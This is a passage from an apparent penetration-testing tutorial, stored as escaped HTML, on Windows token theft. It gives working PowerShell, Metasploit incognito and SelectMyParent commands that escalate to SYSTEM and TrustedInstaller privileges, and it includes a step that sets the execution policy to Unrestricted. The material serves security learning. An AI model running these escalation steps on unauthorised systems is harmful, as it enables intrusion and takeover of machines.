src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019870965_6_14c99a9897-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Invoke-TokenManipulation.ps1 Usage\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Download link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FExfiltration\u002FInvoke-TokenManipulation.ps1\u003C\u002Fp>\u003Cp>Similar in principle and function to incognito, capable of actual privilege escalation and de-escalation\u003C\u002Fp>\u003Cp>Enumerate tokens: Invoke-TokenManipulation -Enumerate\u003C\u002Fp>\u003Cp>Escalate to system: Invoke-TokenManipulation -CreateProcess \"cmd.exe\" -Username \"nt authority\\system\"\u003C\u002Fp>\u003Cp>Copy process token: Invoke-TokenManipulation -CreateProcess \"cmd.exe\" -ProcessId 500\u003C\u002Fp>\u003Cp>Copy thread token: Invoke-TokenManipulation -CreateProcess \"cmd.exe\" -ThreadId 500\u003C\u002Fp>\u003Cp>More usage can be found in the script documentation\u003C\u002Fp>\u003Cp>Actual testing omitted\u003C\u002Fp>\u003Ch2>0x06 Exploiting tokens to gain TrustedInstaller privileges\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the Windows system, even with administrator and system privileges, system files cannot be modified\u003C\u002Fp>\u003Cp>Because the highest privilege in Windows is TrustedInstaller\u003C\u002Fp>\u003Cp>For example, the path C:\\Windows\\servicing\u003C\u002Fp>\u003Cp>Cannot create files in this path with system privileges\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019875709_7_d65423d76d-1.jpeg\">\u003C\u002Fp>\u003Cp>Check folder properties, showing that the system does not have write permissions, only TrustedInstaller does.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019879623_8_719b1f5aa5-1.jpeg\">\u003C\u002Fp>\u003Cp>For how to obtain TrustedInstaller permissions, refer to this article by James Forshaw, which is highly recommended for learning.\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftyranidslair.blogspot.nl\u002F2017\u002F08\u002Fthe-art-of-becoming-trustedinstaller.html\u003C\u002Fp>\u003Cp>Here, we test one of the examples to find other implementation methods.\u003C\u002Fp>\u003Cp>Starting the TrustedInstaller service launches the process TrustedInstaller.exe, located at C:\\Windows\\servicing\\TrustedInstaller.exe. Check the program's permissions:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Acl -Path C:\\Windows\\servicing\\TrustedInstaller.exe | select Owner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Shows as NT SERVICE\\TrustedInstaller, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019883076_9_96c74fec74-1.jpeg\">\u003C\u002Fp>\u003Cp>James Forshaw's implementation approach is to use the token of TrustedInstaller.exe to create a child process, so the child process gains TrustedInstaller permissions. The specific PowerShell code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Set-NtTokenPrivilege SeDebugPrivilege\u003Cbr>$p = Get-NtProcess -Name TrustedInstaller.exe\u003Cbr>$proc = New-Win32Process cmd.exe -CreationFlags NewConsole -ParentProcess $p\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>PowerShell does not support the Set-NtTokenPrivilege command by default; this module needs to be downloaded and installed.\u003C\u002Fp>\u003Cp>\u003Cstrong>Download address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.powershellgallery.com\u002Fpackages\u002FNtObjectManager\u002F1.1.1\u003C\u002Fp>\u003Cp>Installation command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Save-Module -Name NtObjectManager -Path c:\\test\u003Cbr>Install-Module -Name NtObjectManager\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Save-Module requires PowerShell v5.0 support. For details, see:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fzh-cn\u002Fpowershell\u002Fgallery\u002Freadme\u003C\u002Fp>\u003Cp>Therefore, the test system is selected as Win10, with a default PowerShell version of 5.0\u003C\u002Fp>\u003Cp>Importing this module requires the system to allow PowerShell script execution, so first execute the following code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Set-ExecutionPolicy Unrestricted\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Import module NtObjectManager:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module NtObjectManager\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute command test:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sc.exe start TrustedInstaller\u003Cbr>Set-NtTokenPrivilege SeDebugPrivilege\u003Cbr>$p = Get-NtProcess -Name TrustedInstaller.exe\u003Cbr>$proc = New-Win32Process cmd.exe -CreationFlags NewConsole -ParentProcess $p\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Use whoami to check current cmd privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>whoami \u002Fgroups \u002Ffo list\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Found current cmd.exe is in the TrustedInstaller group, successfully obtained TrustedInstaller privileges\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019886811_10_62b8d2941c-1.jpeg\">\u003C\u002Fp>\u003Cp>Then, following the updated content in James Forshaw's article, learned Vincent Yiu@vysecurity's method, using incognito from metasploit can also obtain TrustedInstaller privileges\u003C\u002Fp>\u003Cp>\u003Cstrong>Address as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002Fvysecurity\u002Fstatus\u002F899303538630774787\u003C\u002Fp>\u003Cp>Approach as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Start the TrustedInstaller service\u003C\u002Fli>\u003Cli>Use incognito to obtain the token of TrustedInstaller.exe\u003C\u002Fli>\u003Cli>Obtain TrustedInstaller privileges\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Use the following commands:\u003C\u002Fp>\u003Cul>\u003Cli>load incognito\u003C\u002Fli>\u003Cli>getsytem\u003C\u002Fli>\u003Cli>ps\u003C\u002Fli>\u003Cli>steal_token 3204\u003C\u002Fli>\u003Cli>getuid\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Following this logic, it's speculated that using SelectMyParent and Invoke-TokenManipulation.ps1 can also obtain TrustedInstaller privileges\u003C\u002Fp>\u003Cp>Now verify our judgment\u003C\u002Fp>\u003Cp>\u003Cstrong>1. SelectMyParent\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sc start TrustedInstaller\u003Cbr>SelectMyParent.exe cmd.exe 1700\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The new cmd.exe has TrustedInstaller privileges\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Invoke-TokenManipulation.ps1\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add the following code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sc.exe start TrustedInstaller\u003Cbr>$id = Get-Process -name TrustedInstaller* | Select-Object id | ForEach-Object -Process{$_.id}\u003Cbr>Invoke-TokenManipulation -CreateProcess \"cmd.exe\" -ProcessId $id\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The 'sc' command cannot be directly executed in PowerShell as it is treated as an alias for Set-Content. Use sc.exe to run the sc command within PowerShell.\u003C\u002Fp>\u003Ch3>Methods to verify TrustedInstaller privilege acquisition\u003C\u002Fh3>\u003Cp>\u003Cstrong>1. Write files to special paths\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For example C:\\Windows\\servicing, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019888347_11_70331d0b4d-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Using PowerShell\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Acl -Path C:\\Windows\\servicing\\TrustedInstaller.exe | select Owner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The echo should display NT SERVICE\\TrustedInstaller\u003C\u002Fp>\u003Cp>\u003Cstrong>3. Using whoami\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>whoami \u002Fgroups | findstr TrustedInstaller\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Check if there is any echo\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the implementation methods of token theft, using various tools to obtain system privileges and TrustedInstaller privileges.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1613,"Onedaysec",5,"published","2026-02-02T08:19:47.663Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Token Theft & Exploitation: Penetration Testing Techniques","token theft, Windows tokens, penetration testing, privilege escalation, Metasploit incognito, Invoke-TokenManipulation",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45],150,149,{"title":39,"description":39,"image":39},"2026-07-24T15:37:15.101Z","2026-07-23T16:01:05.087Z","draft","2026-07-23T16:04:01.497Z"]